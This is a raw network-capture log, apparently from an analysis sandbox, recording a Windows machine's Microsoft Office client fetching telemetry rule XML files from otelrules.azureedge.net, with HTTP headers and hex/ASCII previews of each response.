                                                                                                      2024-10-08 18:51:38 UTC1354INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 44 58 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 44 58 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.SDX" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSDX" S="Medium" /> <F T="2"> <O


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      111192.168.2.74982413.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:39 UTC192OUTGET /rules/rule703351v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:39 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:39 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1403
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                      ETag: "0x8DC582BDCDD6400"
                                                                                                      x-ms-request-id: 28710430-401e-0029-5d4f-199b43000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185139Z-1657d5bbd48xjgsr3pyv9u71rc00000001f0000000000z9a
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:39 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703351" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      112192.168.2.74982713.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:39 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:39 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:39 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1362
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                      ETag: "0x8DC582BDF497570"
                                                                                                      x-ms-request-id: 838d785c-001e-0014-24fe-165151000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185139Z-1657d5bbd48762wn1qw4s5sd30000000054g000000011hyx
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:39 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      113192.168.2.74982613.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:39 UTC192OUTGET /rules/rule703501v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:39 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:39 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1399
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                      ETag: "0x8DC582BE8C605FF"
                                                                                                      x-ms-request-id: 76dbcc6a-501e-0035-36ed-16c923000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185139Z-1657d5bbd48cpbzgkvtewk0wu000000005e000000000myse
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:39 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      114192.168.2.74982513.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:39 UTC192OUTGET /rules/rule703350v0s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:39 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:39 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1366
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:42 GMT
                                                                                                      ETag: "0x8DC582BDF1E2608"
                                                                                                      x-ms-request-id: c9f5ea47-201e-0071-33fe-16ff15000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185139Z-1657d5bbd48sqtlf1huhzuwq70000000050g00000000yz7n
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:39 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 33 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 63 72 69 70 74 4c 61 62 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 63 72 69 70 74 4c 61 62 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703350" V="0" DC="SM" EN="Office.Telemetry.Event.Office.ScriptLab" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenScriptLab" S="Medium" /> <F T="2


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      115192.168.2.74982813.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:39 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:39 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:39 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1403
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                      ETag: "0x8DC582BDC2EEE03"
                                                                                                      x-ms-request-id: 013451e4-b01e-001e-58e7-180214000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185139Z-1657d5bbd48jwrqbupe3ktsx9w00000005m000000000er17
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:39 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      116192.168.2.74982913.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:40 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1366
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                      ETag: "0x8DC582BEA414B16"
                                                                                                      x-ms-request-id: 8a56303a-c01e-0066-0f01-17a1ec000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd48tqvfc1ysmtbdrg000000005a0000000005u08
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:40 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      117192.168.2.74983013.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:40 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1399
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                      ETag: "0x8DC582BE1CC18CD"
                                                                                                      x-ms-request-id: cd0b82ba-d01e-0049-1304-17e7dc000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd48762wn1qw4s5sd3000000005ag000000003pbd
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:40 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      118192.168.2.74983113.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:40 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1362
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                      ETag: "0x8DC582BEB256F43"
                                                                                                      x-ms-request-id: 0c184816-a01e-000d-72ff-16d1ea000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd48dfrdj7px744zp8s000000057000000000342g
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:40 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      119192.168.2.74983213.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:40 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1403
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                      ETag: "0x8DC582BEB866CDB"
                                                                                                      x-ms-request-id: d3a3eb01-b01e-003d-1ef1-16d32c000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd48xlwdx82gahegw4000000005hg00000000pghu
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-08 18:51:40 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                      120192.168.2.74983313.107.246.60443
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-08 18:51:40 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Accept-Encoding: gzip
                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                      Host: otelrules.azureedge.net
                                                                                                      2024-10-08 18:51:40 UTC563INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 08 Oct 2024 18:51:40 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 1366
                                                                                                      Connection: close
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Vary: Accept-Encoding
                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                      ETag: "0x8DC582BE5B7B174"
                                                                                                      x-ms-request-id: ca2bab4f-201e-0071-5e14-17ff15000000
                                                                                                      x-ms-version: 2018-03-28
                                                                                                      x-azure-ref: 20241008T185140Z-1657d5bbd48762wn1qw4s5sd300000000540000000014c37
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
